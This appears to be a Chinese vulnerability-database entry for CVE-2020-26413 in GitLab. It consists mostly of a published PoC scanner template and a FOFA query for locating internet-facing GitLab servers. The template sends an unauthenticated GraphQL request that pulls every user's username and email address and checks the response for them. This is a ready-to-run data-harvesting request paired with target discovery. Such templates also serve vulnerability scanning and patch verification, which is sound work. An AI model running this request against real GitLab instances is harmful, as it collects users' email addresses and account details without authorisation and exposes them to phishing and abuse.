CVE-2020-26413: GitLab Information Disclosure

日期: 2025-09-01 | 影响软件: GitLab | POC: 已公开

漏洞描述

fofa app="GitLab"

PoC代码[已公开]

id: CVE-2020-26413

info:
    name: GitLab Information Disclosure
    author: Print1n(https://github.com/Print1n)
    severity: medium
    description: fofa app="GitLab"

rules:
    r0:
        request:
            method: POST
            path: /api/graphql
            headers:
                Content-Type: application/json
            body: '{"query":"{\nusers {\nedges {\n  node {\n    username\n    email\n    avatarUrl\n    status {\n      emoji\n      message\n      messageHtml\n     }\n    }\n   }\n  }\n }","variables":null,"operationName":null}'
        expression: response.status == 200 && "x-runtime" in response.headers && response.body.bcontains(b"{\"data\":{\"users\":{\"edges\":[{\"node\":{\"username\":\"") && "\",\"email\":\"[^\"]+@[^\"]+\"".bmatches(response.body)
expression: r0()

相关漏洞推荐